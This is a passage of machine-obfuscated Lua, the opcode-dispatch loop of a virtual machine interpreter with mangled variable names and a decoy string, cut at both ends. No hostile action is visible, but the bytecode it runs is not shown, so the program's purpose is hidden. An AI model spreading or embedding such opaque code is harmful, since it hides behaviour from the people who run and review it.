16) elseif (net_e == 3) then net_a[3] = net_b() - (2 ^ 16) net_a[4] = net_f() end if (net_c(net_g, 1, 1) == 1) then net_a[2] = net_d[net_a[2]] end if (net_c(net_g, 2, 2) == 1) then net_a[3] = net_d[net_a[3]] end if (net_c(net_g, 3, 3) == 1) then net_a[4] = net_d[net_a[4]] end net_h[net_i] = net_a end end return net_i end local function net_m(net_a, net_k, net_f) net_a = (net_a == true and net_l()) or net_a return (function(...) local net_d = net_a[1] local net_e = net_a[3] local net_p = net_a[2] local net_n = net_n local net_b = 1 local net_h = -1 local net_l = {} local net_r = {...} local net_o = net_o("#", ...) - 1 local net_j = {} local net_c = {} for net_a = 0, net_o do if (net_a >= net_e) then net_l[net_a - net_e] = net_r[net_a + 1] else net_c[net_a] = net_r[net_a + #{"1 + 1 = 111"}] end end local net_o = net_o - net_e + 1 local net_a local net_e while true do net_a = net_d[net_b] net_e = net_a[1] if net_e <= 67 then if net_e <= 33 then if net_e <= 16 then if net_e <= 7 then if net_e <= 3 then if net_e <= 1 then if net_e > 0 then local net_e = net_a[2] local net_f = net_a[4] local net_d = net_e + 2 local net_e = {net_c[net_e](net_c[net_e + 1], net_c[net_d])} for net_a = 1, net_f do net_c[net_d + net_a] = net_e[net_a] end local net_e = net_e[1] if net_e then net_c[net_d] = net_e net_b = net_a[3] else net_b = net_b + 1 end else local net_a = net_a[2] do return net_c[net_a](net_g(net_c, net_a + 1, net_h)) end end elseif net_e > 2 then local net_g local net_k, net_j local net_i local net_e net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_i = net_c[net_a[3]] net_c[net_e + 1] = net_i net_c[net_e] = net_i[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_k, net_j = net_n(net_c[net_e](net_c[net_e + 1])) net_h = net_j + net_e - 1 net_g = 0 for net_a = net_e, net_h do net_g = net_g + 1 net_c[net_a] = net_k[net_g] end else local net_a = net_a[2] local net_b = net_c[net_a] for net_a = net_a + 1, net_h do net_i(net_b, net_c[net_a]) end end elseif net_e <= 5 then if net_e > 4 then local net_b = net_a[2] local net_d = net_c[net_b] for net_a = net_b + 1, net_a[3] do net_i(net_d, net_c[net_a]) end else net_c[net_a[2]] = net_c[net_a[3]] end elseif net_e == 6 then net_c[net_a[2]] = net_k[net_a[3]] else local net_b = net_a[2] net_c[net_b] = net_c[net_b](net_g(net_c, net_b + 1, net_a[3])) end elseif net_e <= 11 then if net_e <= 9 then if net_e == 8 then local net_g local net_e net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_g = net_c[net_a[3]] net_c[net_e + 1] = net_g net_c[net_e] = net_g[net_a[4]] else net_c[net_a[2]][net_a[3]] = net_a[4] end elseif net_e > 10 then local net_a = net_a[2] do return net_g(net_c, net_a, net_h) end else net_c[net_a[2]] = {} end elseif net_e <= 13 then if net_e == 12 then local net_f local net_e net_e = net_a[2] net_f = net_c[net_a[3]] net_c[net_e + 1] = net_f net_c[net_e] = net_f[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] if (net_c[net_a[2]] == net_c[net_a[4]]) then net_b = net_b + 1 else net_b = net_a[3] end else net_c[net_a[2]] = net_c[net_a[3]] - net_c[net_a[4]] end elseif net_e <= 14 then local net_g local net_h local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = {net_c[net_e](net_c[net_e + 1])} net_g = 0 for net_a = net_e, net_a[4] do net_g = net_g + 1 net_c[net_a] = net_h[net_g] end net_b = net_b + 1 net_a = net_d[net_b] net_b = net_a[3] elseif net_e > 15 then if (net_c[net_a[2]] == net_c[net_a[4]]) then net_b = net_b + 1 else net_b = net_a[3] end else net_c[net_a[2]] = net_f[net_a[3]] end elseif net_e <= 24 then if net_e <= 20 then if net_e <= 18 then if net_e > 17 then local net_i local net_j, net_k local net_e net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_j, net_k = net_n(net_c[net_e](net_c[net_e + 1])) net_h = net_k + net_e - 1 net_i = 0 for net_a = net_e, net_h do net_i = net_i + 1 net_c[net_a] = net_j[net_i] end net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] do return net_c[net_e](net_g(net_c, net_e + 1, net_h)) end net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] do return net_g(net_c, net_e, net_h) end net_b = net_b + 1 net_a = net_d[net_b] do return end else local net_f = net_a[2] local net_e = {} for net_a = 1, #net_j do local net_a = net_j[net_a] for net_b = 0, #net_a do local net_b = net_a[net_b] local net_d = net_b[1] local net_a = net_b[2] if net_d == net_c and net_a >= net_f then net_e[net_a] = net_d[net_a] net_b[1] = net_e end end end end elseif net_e == 19 then net_c[net_a[2]] = net_c[net_a[3]] / net_c[net_a[4]] else local net_b = net_a[2] do return net_c[net_b](net_g(net_c, net_b + 1, net_a[3])) end end elseif net_e <= 22 then if net_e == 21 then local net_g local net_i local net_h local net_l local net_k local net_e net_e = net_a[2] net_c[net_e] = net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_k = {} for net_a = 1, #net_j do net_l = net_j[net_a] for net_a = 0, #net_l do net_h = net_l[net_a] net_i = net_h[1] net_g = net_h[2] if net_i == net_c and net_g >= net_e then net_k[net_g] = net_i[net_g] net_h[1] = net_k end end end net_b = net_b + 1 net_a = net_d[net_b] net_b = net_a[3] else for net_a = net_a[2], net_a[3] do net_c[net_a] = nil end end elseif net_e > 23 then net_c[net_a[2]] = (net_a[3] ~= 0) else do return net_c[net_a[2]] end end elseif net_e <= 28 then if net_e <= 26 then if net_e > 25 then if (net_c[net_a[2]] <= net_c[net_a[4]]) then net_b = net_a[3] else net_b = net_b + 1 end else local net_a = net_a[2] do return net_g(net_c, net_a, net_h) end end elseif net_e == 27 then net_c[net_a[2]] = net_k[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_k[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] do return end else local net_h = net_p[net_a[3]] local net_g local net_e = {} net_g = net_q( {}, {__index = function(net_b, net_a) local net_a = net_e[net_a] return net_a[1][net_a[2]] end, __newindex = function(net_c, net_a, net_b) local net_a = net_e[net_a] net_a[1][net_a[2]] = net_b end} ) for net_f = 1, net_a[4] do net_b = net_b + 1 local net_a = net_d[net_b] if net_a[1] == 89 then net_e[net_f - 1] = {net_c, net_a[3]} else net_e[net_f - 1] = {net_k, net_a[3]} end net_j[#net_j + 1] = net_e end net_c[net_a[2]] = net_m(net_h, net_g, net_f) end elseif net_e <= 30 then if net_e > 29 then local net_a = net_a[2] net_c[net_a] = net_c[net_a](net_c[net_a + 1]) else local net_g local net_e net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = {} net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_g = net_c[net_e] for net_a = net_e + 1, net_a[3] do net_i(net_g, net_c[net_a]) end end elseif net_e <= 31 then do return end elseif net_e > 32 then do return end else local net_b = net_a[2] do return net_c[net_b](net_g(net_c, net_b + 1, net_a[3])) end end elseif net_e <= 50 then if net_e <= 41 then if net_e <= 37 then if net_e <= 35 then if net_e == 34 then net_c[net_a[2]] = net_f[net_a[3]] else local net_e net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] if not net_c[net_a[2]] then net_b = net_b + 1 else net_b = net_a[3] end end elseif net_e == 36 then local net_h local net_g local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] / net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_g = net_c[net_e] net_h = net_c[net_e + 2] if (net_h > 0) then if (net_g > net_c[net_e + 1]) then net_b = net_a[3] else net_c[net_e + 3] = net_g end elseif (net_g < net_c[net_e + 1]) then net_b = net_a[3] else net_c[net_e + 3] = net_g end else local net_a = net_a[2] local net_d, net_b = net_n(net_c[net_a](net_c[net_a + 1])) net_h = net_b + net_a - 1 local net_b = 0 for net_a = net_a, net_h do net_b = net_b + 1 net_c[net_a] = net_d[net_b] end end elseif net_e <= 39 then if net_e == 38 then if (net_c[net_a[2]] ~= net_c[net_a[4]]) then net_b = net_b + 1 else net_b = net_a[3] end else net_f[net_a[3]] = net_c[net_a[2]] end elseif net_e > 40 then if (net_c[net_a[2]] == net_a[4]) then net_b = net_b + 1 else net_b = net_a[3] end else local net_d = net_a[2] local net_e = net_c[net_d] local net_f = net_c[net_d + 2] if (net_f > 0) then if (net_e > net_c[net_d + 1]) then net_b = net_a[3] else net_c[net_d + 3] = net_e end elseif (net_e < net_c[net_d + 1]) then net_b = net_a[3] else net_c[net_d + 3] = net_e end end elseif net_e <= 45 then if net_e <= 43 then if net_e > 42 then local net_b = net_a[2] net_c[net_b] = net_c[net_b](net_g(net_c, net_b + 1, net_a[3])) else local net_e net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = (net_a[3] ~= 0) net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = (net_a[3] ~= 0) net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_a[4] end elseif net_e > 44 then local net_g local net_e net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_g = net_c[net_a[3]] net_c[net_e + 1] = net_g net_c[net_e] = net_g[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] net_b = net_a[3] else if not net_c[net_a[2]] then net_b = net_b + 1 else net_b = net_a[3] end end elseif net_e <= 47 then if net_e == 46 then local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] / net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] * net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] - net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] else net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] end elseif net_e <= 48 then local net_b = net_a[2] local net_d = net_c[net_b] for net_a = net_b + 1, net_a[3] do net_i(net_d, net_c[net_a]) end elseif net_e == 49 then for net_a = net_a[2], net_a[3] do net_c[net_a] = nil end else net_c[net_a[2]]() end elseif net_e <= 58 then if net_e <= 54 then if net_e <= 52 then if net_e > 51 then local net_i local net_j, net_k local net_e net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_j, net_k = net_n(net_c[net_e](net_c[net_e + 1])) net_h = net_k + net_e - 1 net_i = 0 for net_a = net_e, net_h do net_i = net_i + 1 net_c[net_a] = net_j[net_i] end net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] do return net_c[net_e](net_g(net_c, net_e + 1, net_h)) end net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] do return net_g(net_c, net_e, net_h) end net_b = net_b + 1 net_a = net_d[net_b] do return end else net_c[net_a[2]] = net_m(net_p[net_a[3]], nil, net_f) end elseif net_e == 53 then local net_h = net_p[net_a[3]] local net_g local net_e = {} net_g = net_q( {}, {__index = function(net_b, net_a) local net_a = net_e[net_a] return net_a[1][net_a[2]] end, __newindex = function(net_c, net_a, net_b) local net_a = net_e[net_a] net_a[1][net_a[2]] = net_b end} ) for net_f = 1, net_a[4] do net_b = net_b + 1 local net_a = net_d[net_b] if net_a[1] == 89 then net_e[net_f - 1] = {net_c, net_a[3]} else net_e[net_f - 1] = {net_k, net_a[3]} end net_j[#net_j + 1] = net_e end net_c[net_a[2]] = net_m(net_h, net_g, net_f) else net_c[net_a[2]] = net_c[net_a[3]] * net_c[net_a[4]] end elseif net_e <= 56 then if net_e == 55 then local net_a = net_a[2] net_c[net_a](net_c[net_a + 1]) else if (net_c[net_a[2]] == net_a[4]) then net_b = net_b + 1 else net_b = net_a[3] end end elseif net_e > 57 then net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] + net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] if (net_c[net_a[2]] <= net_c[net_a[4]]) then net_b = net_a[3] else net_b = net_b + 1 end else local net_d = net_a[2] local net_e = {net_c[net_d](net_c[net_d + 1])} local net_b = 0 for net_a = net_d, net_a[4] do net_b = net_b + 1 net_c[net_a] = net_e[net_b] end end elseif net_e <= 62 then if net_e <= 60 then if net_e > 59 then if not net_c[net_a[2]] then net_b = net_b + 1 else net_b = net_a[3] end else net_c[net_a[2]] = net_c[net_a[3]] + net_c[net_a[4]] end elseif net_e > 61 then local net_d = net_a[2] local net_f = net_c[net_d + 2] local net_e = net_c[net_d] + net_f net_c[net_d] = net_e if (net_f > 0) then if (net_e <= net_c[net_d + 1]) then net_b = net_a[3] net_c[net_d + 3] = net_e end elseif (net_e >= net_c[net_d + 1]) then net_b = net_a[3] net_c[net_d + 3] = net_e end else local net_e net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = {} net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] if net_c[net_a[2]] then net_b = net_b + 1 else net_b = net_a[3] end end elseif net_e <= 64 then if net_e > 63 then local net_b = net_a[2] local net_e = {net_c[net_b](net_c[net_b + 1])} local net_d = 0 for net_a = net_b, net_a[4] do net_d = net_d + 1 net_c[net_a] = net_e[net_d] end else local net_d = net_a[2] local net_f = net_c[net_d + 2] local net_e = net_c[net_d] + net_f net_c[net_d] = net_e if (net_f > 0) then if (net_e <= net_c[net_d + 1]) then net_b = net_a[3] net_c[net_d + 3] = net_e end elseif (net_e >= net_c[net_d + 1]) then net_b = net_a[3] net_c[net_d + 3] = net_e end end elseif net_e <= 65 then local net_h local net_e net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] / net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] / net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] / net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_b = net_a[3] elseif net_e == 66 then if (net_c[net_a[2]] == net_c[net_a[4]]) then net_b = net_b + 1 else net_b = net_a[3] end else if net_c[net_a[2]] then net_b = net_b + 1 else net_b = net_a[3] end end elseif net_e <= 101 then if net_e <= 84 then if net_e <= 75 then if net_e <= 71 then if net_e <= 69 then if net_e > 68 then local net_e net_c[net_a[2]] = net_k[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] else if (net_c[net_a[2]] ~= net_c[net_a[4]]) then net_b = net_b + 1 else net_b = net_a[3] end end elseif net_e == 70 then local net_a = net_a[2] net_c[net_a] = net_c[net_a]() else net_c[net_a[2]] = net_c[net_a[3]] - net_c[net_a[4]] end elseif net_e <= 73 then if net_e > 72 then if (net_c[net_a[2]] ~= net_a[4]) then net_b = net_b + 1 else net_b = net_a[3] end else local net_g local net_i local net_h local net_e net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_i = {net_c[net_e](net_c[net_e + 1])} net_g = 0 for net_a = net_e, net_a[4] do net_g = net_g + 1 net_c[net_a] = net_i[net_g] end net_b = net_b + 1 net_a = net_d[net_b] net_b = net_a[3] end elseif net_e == 74 then local net_b = net_a[2] net_c[net_b](net_g(net_c, net_b + 1, net_a[3])) else net_b = net_a[3] end elseif net_e <= 79 then if net_e <= 77 then if net_e == 76 then local net_a = net_a[2] net_h = net_a + net_o - 1 for net_b = net_a, net_h do local net_a = net_l[net_b - net_a] net_c[net_b] = net_a end else local net_b = net_a[2] local net_d = net_c[net_a[3]] net_c[net_b + 1] = net_d net_c[net_b] = net_d[net_a[4]] end elseif net_e > 78 then net_c[net_a[2]] = net_a[3] else net_c[net_a[2]] = net_k[net_a[3]] end elseif net_e <= 81 then if net_e == 80 then net_c[net_a[2]]() else local net_h local net_e net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = (net_a[3] ~= 0) net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = (net_a[3] ~= 0) net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] 